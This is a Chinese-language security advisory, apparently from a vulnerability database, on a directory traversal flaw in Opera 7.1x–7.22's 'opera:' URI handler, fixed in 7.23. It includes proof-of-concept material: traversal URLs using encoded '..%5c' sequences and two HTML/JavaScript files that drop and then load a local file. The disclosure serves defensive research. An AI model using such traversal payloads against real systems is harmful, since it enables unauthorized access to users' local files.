Opera Web Browser Opera: URI处理器目录遍历漏洞
发布日期:2003-11-12
更新日期:2003-11-28
受影响系统:Opera Software Opera Web Browser 7.22
Opera Software Opera Web Browser 7.21
Opera Software Opera Web Browser 7.20
Opera Software Opera Web Browser 7.11b
Opera Software Opera Web Browser 7.11
Opera Software Opera Web Browser 7.10
不受影响系统:Opera Software Opera Web Browser 7.23
描述:
BUGTRAQ ID:
9021
Opera是一款流行的WEB浏览器。
Opera的'Opera:' URI处理器在处理用户提供的数据时缺少充分过滤,远程攻击者可以利用这个漏洞构建恶意链接,诱使用户访问,可以用户权限访问本地文件。
Opera浏览器定义一个类似"opera:"的内部URL协议,可用于显示文档和帮助文件。如要查看帮助文件,可使用"opera:/help/",会浏览"C:\Program Files\Opera7\help"目录下帮助文件, 虽然opera对"../"数据进行了正确过滤,会提示非法地址的对话框,但攻击者可以通过使用"..%5c"或"..%2f"绕过/help/目录的限制,可能导致以用户权限访问本地文件。
<*来源:S.G.Masood (
sgmasood@yahoo.com)
链接:
http://marc.theaimsgroup.com/?l=bugtraq&m=106865376905039&w=2
http://marc.theaimsgroup.com/?l=bugtraq&m=106865449306205&w=2
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
S.G.Masood (
sgmasood@yahoo.com)提供了如下测试方法:
opera:/help/..%5c..%5c..%5cwinnt/notepad.exe
---------------START MAIN.HTM----------------
<html>
<head>
<script language="javascript">
var win=open("skin.htm") // The server should return content-type as // "application/x-opera-skin" for "Skin.htm". "Skin.htm" will be dropped in the
"<opera // dir>/profile/skin/" folder.
setTimeout("redir()",2000) //modify according to your situation.
function redir(){
window.location.href="opera:/help/..%5c/profile/skin/skin.htm" //This uses the // directory traversal flaw mentioned in advisory 2 to get the path of the
dropped file. In this // case, it is skin.htm.
}
</script>
</head>
<body>
<h1>This is the main file</h1>
</body>
</html>
---------------END MAIN.HTM----------------
---------------START SKIN.HTM----------------
<body>
<h1> Opera Skinned!!! </h1><p>This is Skin.htm from "<opera dir>/profile/skin/" in localhost.
</body>
---------------END SKIN.HTM----------------
建议:
厂商补丁:
Opera Software
--------------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载Opera 7.23版本:
http://www.opera.com/浏览次数:3290
严重程度:0(网友投票)